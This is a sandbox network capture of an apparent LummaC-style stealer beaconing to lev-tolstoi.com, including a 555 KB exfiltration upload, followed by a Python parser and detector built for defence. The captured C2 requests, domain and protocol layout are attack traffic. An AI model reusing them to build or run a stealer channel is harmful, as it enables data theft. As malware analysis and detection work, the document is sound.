                                                                                                                                                                                                                                    2024-12-18 08:52:48 UTC5183OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d 1b 88 82
                                                                                                                                                                                                                                    Data Ascii: un 4F([:7s~X`nO`i`
2024-12-18 08:52:49 UTC | 1039 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 08:52:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=qk72r0cpg3i2bkgsp7dor3aq1j; expires=Sun, 13-Apr-2025 02:39:28 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NJCQ0Yr7SvLjNIiu0U0Wi9%2Fsyc0pbgp%2FEy3Zn6CPW1p8rXaneBX3yYUNbW95ZBJ4yvlszfvw9JNS0WFHV4TRmE7PF9CwM%2BDuUlR5IbOYL7Ea0t2PanzgZxrquOj9rIk1odQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f3deb398e4f8c87-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2017&min_rtt=2006&rtt_var=760&sent=15&recv=23&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21467&delivery_rate=1455633&cwnd=214&unsent_bytes=0&cid=03545d107b1f500b&ts=1756&x=0"
2024-12-18 08:52:49 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-18 08:52:49 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49922 | 172.67.157.254 | 443 | 1972 | C:\Users\user\Desktop\ardware-v1.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 08:52:51 UTC | 279 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=DPBZA0XI7BIZVZ5YU
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1232
Host: lev-tolstoi.com
                                                                                                                                                                                                                                    2024-12-18 08:52:51 UTC1232OUTData Raw: 2d 2d 44 50 42 5a 41 30 58 49 37 42 49 5a 56 5a 35 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 37 43 42 34 46 46 41 32 30 42 34 39 38 45 36 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 44 50 42 5a 41 30 58 49 37 42 49 5a 56 5a 35 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 44 50 42 5a 41 30 58 49 37 42 49 5a 56 5a 35 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 66 4c 38 72 65 2d 2d 0d 0a 2d 2d 44 50 42 5a
                                                                                                                                                                                                                                    Data Ascii: --DPBZA0XI7BIZVZ5YUContent-Disposition: form-data; name="hwid"B7CB4FFA20B498E6AC8923850305D13E--DPBZA0XI7BIZVZ5YUContent-Disposition: form-data; name="pid"1--DPBZA0XI7BIZVZ5YUContent-Disposition: form-data; name="lid"tfL8re----DPBZ
                                                                                                                                                                                                                                    2024-12-18 08:52:52 UTC1038INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Wed, 18 Dec 2024 08:52:52 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: PHPSESSID=agrcaf20hv03ngi5p487a1jfa7; expires=Sun, 13-Apr-2025 02:39:31 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OoM8sr8hAxiGJBtx%2FY3Cm6QUKAGwh%2Fl2vjkTz7NGbLvgnUpCcDdNL0TiCxHWfsEHmG9c%2BSlRpQNurf0EaIgI1VhYnhiXe3C9VupkJkAqGxr%2BIEtDTw3WNaJcGQc85LHC2ec%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                    CF-RAY: 8f3deb4e4fde4319-EWR
                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1693&min_rtt=1690&rtt_var=639&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2147&delivery_rate=1703617&cwnd=233&unsent_bytes=0&cid=bf983fc2563a5984&ts=1475&x=0"
                                                                                                                                                                                                                                    2024-12-18 08:52:52 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                    2024-12-18 08:52:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49932 | 172.67.157.254 | 443 | 1972 | C:\Users\user\Desktop\ardware-v1.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-18 08:52:54 UTC | 275 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=BMHH2DI7CB9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 555019
Host: lev-tolstoi.com
2024-12-18 08:52:54 UTC | 15331 | OUT | Data Raw: 2d 2d 42 4d 48 48 32 44 49 37 43 42 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 37 43 42 34 46 46 41 32 30 42 34 39 38 45 36 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 42 4d 48 48 32 44 49 37 43 42 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 42 4d 48 48 32 44 49 37 43 42 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 66 4c 38 72 65 2d 2d 0d 0a 2d 2d 42 4d 48 48 32 44 49 37 43 42 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44
Data Ascii (line breaks restored from the 0d 0a bytes; the report truncates the body here):
--BMHH2DI7CB9
Content-Disposition: form-data; name="hwid"

B7CB4FFA20B498E6AC8923850305D13E
--BMHH2DI7CB9
Content-Disposition: form-data; name="pid"

1
--BMHH2DI7CB9
Content-Disposition: form-data; name="lid"

tfL8re--
--BMHH2DI7CB9
Content-D
2024-12-18 08:52:54 UTC | 15331 | OUT | Data Raw: 1b fb 66 40 52 9a c1 7d 29 d4 50 84 b7 84 16 3f f4 5a 68 fe 53 db 3f 86 b1 c6 c8 58 d5 e4 20 0c b2 7c 4e 66 12 d2 03 21 c9 ad 39 6d d7 f8 44 d1 fd 86 c6 0f 8d df 87 4c 46 91 95 ef 39 d8 42 79 06 08 75 85 af 46 2d 43 be c4 f8 84 a0 b9 d5 c2 55 f7 12 68 ca b9 e0 a9 e5 1f fa cc 1b 0d 4d 33 e8 1a 7c ae 27 74 57 fd 07 be 2f f6 98 52 31 2e 2d 3c a0 c4 de 43 50 20 58 0a bf 79 6d d2 3a 51 80 b2 34 a9 f6 3d 29 2c ea c2 56 74 f0 89 c8 fd 74 af 3f 64 ca da da 5c 50 a1 2b 38 32 b8 aa c8 e8 bb 63 8f 04 c7 91 e4 c3 38 ff 44 c8 dd 01 d4 92 9b 21 38 88 3b 26 31 4a f1 67 6f 28 01 da 11 14 ec e3 16 fe ce 6f bc f2 a9 26 38 21 b1 f5 d2 67 2c d9 a1 e5 93 0e 28 1e 5f a1 95 1d a7 f2 c6 9b 82 e6 8a ee ef 80 6e 5d 83 0d 11 c0 15 39 ea 9c ef 3d 77 03 3d d9 28 32 6e 31 f0 85 0f 76
Data Ascii: f@R})P?ZhS?X |Nf!9mDLF9ByuF-CUhM3|'tW/R1.-<CP Xym:Q4=),Vtt?d\P+82c8D!8;&1Jgo(o&8!g,(_n]9=w=(2n1v
2024-12-18 08:52:54 UTC | 15331 | OUT | Data Raw: ed 38 39 11 f5 56 b2 30 10 fd 69 98 12 17 1d 47 c1 ed 6e 43 dd b9 2d ea 13 ca 27 e6 91 22 e3 10 e1 66 73 02 2b 0c f1 fd 69 5c 70 45 b8 11 e5 9f 38 87 78 19 a0 a4 5c ca bf 50 db 11 8c d0 17 9c ad cd 60 48 6c ad ea 1b cf 28 fd 1e ad 32 1e ab ad 50 9e ea 4d 50 c1 67 c7 45 60 4a b7 dd da 88 f5 cc 4a 76 c6 60 d6 b7 82 54 53 85 b9 45 c1 23 2d 91 2c f7 85 df 38 e1 23 91 96 76 13 39 15 6d da 71 6b 9c 26 96 7b 41 d3 0c df 5c f3 b8 f1 d5 3b e1 a1 cd f5 23 eb be a6 b4 00 d1 36 b9 d4 88 3b bd ab 5a e4 af be c4 36 c3 8e 70 59 e6 b9 9a 3c 44 3b 6e 42 32 53 da 47 b0 fa 54 5b 16 ba 2b 24 7e c6 01 60 08 09 1f 85 e3 61 32 e6 e8 4b 1b dd 5c 1a 94 fc ee 8e a4 d4 f5 58 82 8a 47 b7 be 4c 20 47 6c cf 3c 73 c3 b8 36 2d 37 e3 8a b2 da a6 5d 5f 42 60 0a e7 23 3f b6 06 af 18 9b a9
Data Ascii: 89V0iGnC-'"fs+i\pE8x\P`Hl(2PMPgE`JJv`TSE#-,8#v9mqk&{A\;#6;Z6pY<D;nB2SGT[+$~`a2K\XGL Gl<s6-7]_B`#?
2024-12-18 08:52:54 UTC | 15331 | OUT | Data Raw: 72 f6 ff 3d 3b fc 14 e8 3a 83 b4 60 18 b9 69 40 ef 4e bf 0a ac dd f1 0d ed 7c 20 7e d6 bb 43 a7 2f d2 ad 58 ec e5 ab f4 80 16 0b 34 f9 1f d8 43 38 4e 02 de e3 12 56 aa 0a a4 ce 8b 32 3a ff 3c a1 33 b6 0f c3 8e 04 9b 62 9c df 69 9b 26 3c e0 e1 43 99 46 ea e4 fa e1 08 ea 7f 7f fc a6 14 ce ff 93 13 21 c6 77 33 c9 0c 76 08 04 82 64 c6 af 40 55 46 59 29 3d e9 06 a9 02 35 7d 91 fa 4d 80 91 2e 21 8e 86 93 1f c7 11 38 d1 25 62 2b bf ad c2 8f 7a f4 f1 7e c5 39 52 1b 77 35 e3 f7 34 2b af d4 69 65 29 26 8e 24 b9 a4 a3 c3 fb 4c 0f 56 a2 d9 d9 f8 b5 15 c7 35 61 81 dd 82 f9 05 64 3d ac 78 c7 cf 31 70 a4 99 a2 88 50 2d f6 4f 5a f5 b3 75 b9 c1 2c d5 3a 70 3f e5 70 9c a7 fe bc 55 6f a4 d6 54 1e 48 f6 ae f5 25 bc 8f 8a d4 dc 60 e1 e5 a8 eb c3 02 cc cf 2c c5 2c 22 f2 d0 98
Data Ascii: r=;:`i@N| ~C/X4C8NV2:<3bi&<CF!w3vd@UFY)=5}M.!8%b+z~9Rw54+ie)&$LV5ad=x1pP-OZu,:p?pUoTH%`,,"
2024-12-18 08:52:54 UTC | 15331 | OUT | Data Raw: 49 7c ec 86 78 d3 64 a6 d1 07 85 ba ea c5 91 ce 8a 40 c9 df 67 94 19 0a 22 af 00 1d cf f1 d3 ce 8c 0e eb d0 f0 80 90 97 1c 13 82 38 de 40 89 89 2d be 41 46 91 43 71 2c 61 bf 9d 71 04 f2 63 c7 e5 ed 8e 11 93 0a 0c 64 85 f6 ed 39 c7 72 3f 75 c2 4b 4c 47 6c fb e7 f2 49 4d cc 7d b9 d0 3b ff 4e 27 b9 cf cc 90 d2 d6 24 37 13 bd f1 fb c0 b9 0f 4e 4d c6 9d 07 c1 cb c3 49 9e 7c 9c a5 3e 58 5b fb 34 a2 15 71 4d 21 d8 30 ed 8b 72 7f 37 84 68 71 4e 1d 1f 54 0c bd fc ef 2d a8 c2 c2 e7 e2 42 d6 59 97 40 5c 29 c4 20 c0 5f 03 31 96 10 48 9d 63 14 da 64 5e 90 d0 35 fa 01 65 d6 7e 98 d9 1c 45 91 b7 3e b6 3f 9e 69 c9 45 98 fb 8b 76 25 8b f1 8c c7 f7 3d 46 7c 87 66 c8 69 8a 4d ee b2 cb 67 20 8a 2a 4f f8 dd 1f 13 3e 42 7e 43 ff dd 13 b4 fd 7f 3b 63 73 c2 ff fe 97 5a 03 d4 45
Data Ascii: I|xd@g"8@-AFCq,aqcd9r?uKLGlIM};N'$7NMI|>X[4qM!0r7hqNT-BY@\) _1Hcd^5e~E>?iEv%=F|fiMg *O>B~C;csZE
2024-12-18 08:52:54 UTC | 15331 | OUT | Data Raw: 0f ac 68 d5 03 af 19 fe be 42 c2 11 c0 02 6b f9 0f 81 f5 05 7e 4d 7e 70 04 51 48 01 3a 6d 0b fc 39 19 b5 24 6d 4e 0c 2b a3 82 2b 06 aa de 79 fb ac 0c 7d 56 db 9a 67 8f fd e7 ad c0 11 06 ce 61 67 b0 20 96 17 68 2e b4 30 f9 8b ff 1c c7 a1 78 5e 68 d9 7d 8e 19 b2 ff 2a a4 5b 23 9d 32 2d a8 12 15 d1 9b bd 19 21 af 8a 90 66 d6 37 9f 24 47 4c 99 0b be ab d0 34 19 d0 f1 28 89 3c 44 5e f3 ec d0 9b ff 50 70 c0 c4 ef 37 ce 48 0f 2b 01 54 b0 51 a6 00 be 62 ad 8e 86 62 31 60 eb a9 b4 8e 0a c8 25 f8 da 69 42 1f 69 70 eb 65 88 61 29 b7 13 27 c2 60 a6 78 d7 ed 99 17 e3 a9 9b d1 f0 49 90 4c 50 f7 e1 c9 8c 20 87 98 b9 2a 0e 33 e2 31 b1 1d c7 be e4 1d a9 be 71 11 7e 8b df b9 c9 6c 67 da 98 36 df 8c 5c c4 c1 66 b7 95 4e 33 d8 54 83 e2 94 f1 bb 7b bf 5c 9f db 8c 6d 4d 7a 20
Data Ascii: hBk~M~pQH:m9$mN++y}Vgag h.0x^h}*[#2-!f7$GL4(<D^Pp7H+TQbb1`%iBipea)'`xILP *31q~lg6\fN3T{\mMz
2024-12-18 08:52:54 UTC | 15331 | OUT | Data Raw: 2d 21 e3 0f 9f df e9 5a c0 56 95 40 75 e1 9e 04 6a fd 38 61 93 79 34 ea bd b8 d6 38 f8 96 7a 22 2d 44 22 53 79 02 61 c7 a4 d8 87 ff e1 cb 53 64 91 10 ec 93 e7 ca 7e f7 07 37 df cb af 99 b5 d3 e6 e9 73 d3 2a 4b 30 62 87 e1 5e 4f be 93 14 71 74 52 0b 45 bb b7 d5 26 36 1a f6 1b 7d 53 af 39 de 9b 9d dd 56 02 59 3b 88 f0 53 f8 37 24 f0 57 1d 62 ff 0c 12 a5 60 3c e2 6d 4b db 21 9c 9a c2 c9 4b 0d ef 8c 51 5d 65 45 f7 14 72 12 35 c7 39 ae 2f 93 f0 56 f7 48 b3 86 7e d8 eb e7 64 68 89 de 09 70 5b 29 4b 60 aa 73 aa c0 1f b5 b7 cc 75 d0 a6 c5 24 cf bc dd 00 21 09 de 06 27 2e 23 2f ee 7b 51 98 08 e3 49 56 2e e9 e8 60 f8 96 0a 33 c7 87 5c 79 34 56 d9 91 da 2d ea e6 fa c5 fb ef fa a5 84 03 a3 27 ca 2c 18 ca 0b ef cd 0b 29 20 88 f1 2b d0 10 30 bb 9f ce 75 70 7d 27 be bf
Data Ascii: -!ZV@uj8ay48z"-D"SyaSd~7s*K0b^OqtRE&6}S9VY;S7$Wb`<mK!KQ]eEr59/VH~dhp[)K`su$!'.#/{QIV.`3\y4V-',) +0up}'
2024-12-18 08:52:54 UTC | 15331 | OUT | Data Raw: 06 12 c8 84 86 32 2d 0a f6 d2 0d c2 40 8c b6 21 5e a8 61 c4 38 c4 b7 c3 fd e2 43 ec a5 3a 03 79 7c 31 ea 4a 3a e1 ee 61 b3 16 ef 4b 0f 08 99 4e 7e ec df 74 cb ec 1a e0 17 45 d5 fe f7 64 bc 38 38 24 f9 68 b7 df a0 70 31 70 77 7c ab 08 66 e5 10 13 a4 fc 00 8e 2f fa d4 17 75 da e9 e3 a4 af 34 67 4d 51 fa 52 63 74 13 12 35 90 56 0c 0a 87 f8 10 01 8a 50 6b 4f bf 45 b8 a1 f5 6a 8b a5 d4 39 5d 7c 7b 04 2d c0 bb 50 02 3c 85 89 ef 2e 08 93 72 1f 61 17 83 d6 fa 8f c4 18 fa 83 9d 29 91 be e7 4d 18 85 ef 52 97 ac 76 0e ca 17 1d 6e 40 90 9e a0 61 29 84 98 cc db 13 5a 3f a5 3c ce eb af 42 36 ac 8f 98 c0 0c a7 c9 98 d3 c1 cd 42 e9 d3 6d 19 b3 5c af a7 bc b2 de 3d 28 3f e3 2f 09 9f 7e 2b 41 27 d1 b1 94 65 64 dd a4 6b 1c 12 79 9d 33 50 76 e1 34 cd 2d 2d b8 2e b4 ef 24 11
Data Ascii: 2-@!^a8C:y|1J:aKN~tEd88$hp1pw|f/u4gMQRct5VPkOEj9]|{-P<.ra)MRvn@a)Z?<B6Bm\=(?/~+A'edky3Pv4--.$
2024-12-18 08:52:54 UTC | 15331 | OUT | Data Raw: 47 41 98 61 ad 9f fb 82 e8 87 fa ad 32 f4 c3 7b 38 93 22 8e a7 76 5a 7b 0b 5c e4 c8 66 e3 89 78 85 01 d6 58 50 81 97 59 4c 5c f4 ad 0a eb 2e d5 c1 56 f8 f7 8a f8 be d8 0d b1 9b dd 2c 55 de a0 4a b5 e8 ef 4d 66 dc e6 fc 87 d6 63 c3 0f dd a3 42 9c 08 f5 fb fb 47 94 56 99 ca e1 09 21 6a 21 43 65 51 08 fa ee f4 f8 30 50 16 c6 f7 02 5e 93 9e e3 a7 3d 58 5e ff 35 0c 9b ff f6 2e ef 02 b8 89 d4 9f c7 85 c0 b1 f7 f6 66 c4 e7 c5 48 f7 a6 0f 15 86 bf 6b e2 05 0a be 65 33 26 0e 17 8c 72 c3 27 0f e8 51 27 c7 3c 8e 3f a9 25 03 3d b1 69 80 70 bf 54 50 06 15 54 54 63 e9 51 c8 02 68 21 33 b9 0b a0 b4 fb f1 f5 ba b0 ff 43 77 a6 fa 8f d8 7c be ab d1 4e 3f 0a 0e e1 f4 07 f8 d9 12 e4 4c 00 2f 95 e1 3e 45 b0 8b 71 ea 6f a2 c9 0f 96 b6 b5 54 ef fd 42 e1 47 47 19 21 85 17 00 6e
Data Ascii: GAa2{8"vZ{\fxXPYL\.V,UJMfcBGV!j!CeQ0P^=X^5.fHke3&r'Q'<?%=ipTPTTcQh!3Cw|N?L/>EqoTBGG!n
2024-12-18 08:52:54 UTC | 15331 | OUT | Data Raw: 9a c4 bf 69 91 ac 37 0a 22 b4 4a c3 7b 1f ae b9 26 98 4a 81 5e 93 0a 94 46 88 83 6c 04 a1 f7 e6 1e 56 72 eb 8f 4f a9 16 c6 07 d6 a7 1e 25 e1 35 84 db df e1 81 71 d2 e6 f9 09 fe fb e4 8f 3c 1b 50 7d a0 45 e0 7d a1 4e a8 f7 bc e2 a5 af 71 91 74 5b e6 42 84 fb c0 84 a9 de e7 60 9a 26 ba c6 c8 b8 4b 17 84 ce ff 9c ce 30 1a 88 fa a4 cd 71 1d 6f 59 b7 69 d9 ec e0 1b 8d 69 15 44 f8 f4 90 7e e0 02 ef 5f 33 7e bd 85 68 6c 42 7f 2c 61 b3 a8 72 a2 de 7d 20 99 37 23 ce fa d5 93 5c f9 66 70 f3 79 e5 fa 80 4d 39 ed 26 eb d7 9c 42 01 6d 91 15 c4 3d 27 0a d1 16 87 08 01 a4 cc b0 0f 95 9b 05 63 ae 3e 8c 10 ee 50 b3 78 50 35 36 a2 7a 05 4f 1d d8 30 66 6f 24 08 73 df 6e 64 3b 6f a4 5c 28 5e bf 37 f7 d6 9a 45 9d 2b 32 e9 3f d1 e5 54 32 00 31 2c eb 48 d7 b7 21 e9 5e 1d fc c7
Data Ascii: i7"J{&J^FlVrO%5q<P}E}Nqt[B`&K0qoYiiD~_3~hlB,ar} 7#\fpyM9&Bm='c>PxP56zO0fo$snd;o\(^7E+2?T21,H!^
2024-12-18 08:52:57 UTC | 1046 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 08:52:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=916ofml38auuk15a5vl4707218; expires=Sun, 13-Apr-2025 02:39:35 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VB%2F2GrEMbvifBY9maIsVUY%2F2lYMO3tfBbYB5oDVvgP24rqI0lWRmhzjPTUeJbM%2FNYuzppbReOPkRp%2BKvSmwHtDlimN%2Fc7BNPKCOlwaymlVTUb1zvKi4RzMSCLMoiqBDM5L8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f3deb6199230f91-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1556&min_rtt=1554&rtt_var=588&sent=331&recv=578&lost=0&retrans=0&sent_bytes=2834&recv_bytes=557514&delivery_rate=1853968&cwnd=218&unsent_bytes=0&cid=c5518ffde62254e1&ts=3386&x=0"
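
The three sessions above and below show the whole C2 conversation of this sample in the clear (the sandbox decrypts TLS): a small multipart POST to /api carrying the fields hwid, pid and lid, a 200 reply whose chunked body is "ok" followed by an IPv4 address, a second multipart POST with the same three fields followed by 555019 bytes of non-text data (the exfiltration upload), and then a urlencoded act=get_message&ver=4.0 poll that repeats the same lid and hwid. The example below is added here and is not part of the Joe Sandbox report or of the malware: it reconstructs the session 8 request body from the Data Raw bytes with the CRLFs restored (the page truncates the body after the lid field, so the closing boundary delimiter is an assumption), decodes the chunked reply, and flags both beacon shapes. The /api path, the field names and the sample values come from the capture; the function names, the header dictionaries and the verdict layout are constructed for this example.

```python
"""Parser and detector for the LummaC-style HTTP C2 exchange captured above."""
import re
from urllib.parse import parse_qs

# Constructed sample input, transcribed from this report. Session 8's multipart
# body is shown truncated on the page ("--DPBZ"), so the closing delimiter below
# is an assumption; the boundary, field names and values are the captured ones.
BOUNDARY = "DPBZA0XI7BIZVZ5YU"
REGISTER_HEADERS = {
    "Content-Type": f"multipart/form-data; boundary={BOUNDARY}",
    "Host": "lev-tolstoi.com",
}
REGISTER_BODY = (
    b"--DPBZA0XI7BIZVZ5YU\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n\r\n'
    b"B7CB4FFA20B498E6AC8923850305D13E\r\n"
    b"--DPBZA0XI7BIZVZ5YU\r\n"
    b'Content-Disposition: form-data; name="pid"\r\n\r\n'
    b"1\r\n"
    b"--DPBZA0XI7BIZVZ5YU\r\n"
    b'Content-Disposition: form-data; name="lid"\r\n\r\n'
    b"tfL8re--\r\n"
    b"--DPBZA0XI7BIZVZ5YU--\r\n"  # assumed closing delimiter (not shown on the page)
)
# Session 8 reply body, exactly the bytes shown: "f\r\nok 8.46.123.189\r\n0\r\n\r\n"
REGISTER_RESPONSE = bytes.fromhex("660d0a6f6b20382e34362e3132332e3138390d0a300d0a0d0a")
# Session 10 poll body (application/x-www-form-urlencoded), as shown on the page.
POLL_HEADERS = {"Content-Type": "application/x-www-form-urlencoded", "Host": "lev-tolstoi.com"}
POLL_BODY = b"act=get_message&ver=4.0&lid=tfL8re--&j=&hwid=B7CB4FFA20B498E6AC8923850305D13E"


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Minimal multipart/form-data parser: {field name: raw value bytes}.
    Splits on CRLF + "--boundary" (RFC 2046), so binary values such as the
    upload in session 9 survive untouched."""
    delim = b"\r\n--" + boundary.encode()
    fields = {}
    for part in (b"\r\n" + body).split(delim)[1:]:     # [0] is the preamble
        if part.startswith(b"--"):                      # "--boundary--": end of body
            break
        head, _, value = part[2:].partition(b"\r\n\r\n")  # drop CRLF after delimiter
        m = re.search(rb'name="([^"]*)"', head)
        if m:
            fields[m.group(1).decode()] = value
    return fields


def decode_chunked(raw: bytes) -> bytes:
    """Decode an HTTP/1.1 chunked body; stops at the zero-length chunk."""
    out, pos = bytearray(), 0
    while True:
        end = raw.index(b"\r\n", pos)
        size = int(raw[pos:end].split(b";", 1)[0], 16)  # ignore chunk extensions
        if size == 0:
            return bytes(out)
        pos = end + 2
        out += raw[pos:pos + size]
        pos += size + 2                                 # skip CRLF after chunk data


def parse_ok_response(raw: bytes):
    """Return the IPv4 address from an "ok <ip>" reply, or None if the body differs."""
    m = re.fullmatch(rb"ok (\d{1,3}(?:\.\d{1,3}){3})\r?\n?", decode_chunked(raw))
    return m.group(1).decode() if m else None


LUMMA_FIELDS = {"hwid", "pid", "lid"}


def classify_request(method: str, path: str, headers: dict, body: bytes) -> dict:
    """Verdict for one request. lumma_c2 is True for the two beacon shapes in this
    capture: a POST /api carrying hwid+pid+lid multipart fields (registration and
    the upload) or an act=...&hwid=... urlencoded form (the get_message poll)."""
    verdict = {"lumma_c2": False, "reason": "", "fields": {}}
    if method != "POST" or path != "/api":
        return verdict
    ctype = headers.get("Content-Type", "")
    if ctype.startswith("multipart/form-data"):
        m = re.search(r"boundary=([^;\s]+)", ctype)
        if not m:
            return verdict
        raw = parse_multipart(body, m.group(1))
        fields = {k: v.decode("ascii", "replace") for k, v in raw.items()}
        if LUMMA_FIELDS.issubset(fields):
            verdict.update(lumma_c2=True, reason="multipart hwid/pid/lid beacon", fields=fields)
    elif ctype.startswith("application/x-www-form-urlencoded"):
        q = {k: v[0] for k, v in
             parse_qs(body.decode("ascii", "replace"), keep_blank_values=True).items()}
        if {"act", "hwid"}.issubset(q):
            verdict.update(lumma_c2=True, reason="urlencoded act=" + q["act"] + " beacon", fields=q)
    return verdict


if __name__ == "__main__":
    print(classify_request("POST", "/api", REGISTER_HEADERS, REGISTER_BODY))
    print("server says:", parse_ok_response(REGISTER_RESPONSE))
    print(classify_request("POST", "/api", POLL_HEADERS, POLL_BODY))
```

Two practical notes. The detector keys on body structure rather than on the host or IP: 172.67.157.254 is a Cloudflare edge address (Server: cloudflare, CF-RAY), so blocking it would hit unrelated sites, and the domain is trivially rotated per build; the /api path plus the hwid/pid/lid triple and the act=/hwid= form are what stay constant across this traffic. And because the transport is TLS on 443, this body inspection only works on sandbox captures or behind a TLS-inspecting proxy; on the wire, the Host name in the SNI and the 555 KB outbound POST shortly after a small one are the observable signals.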


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
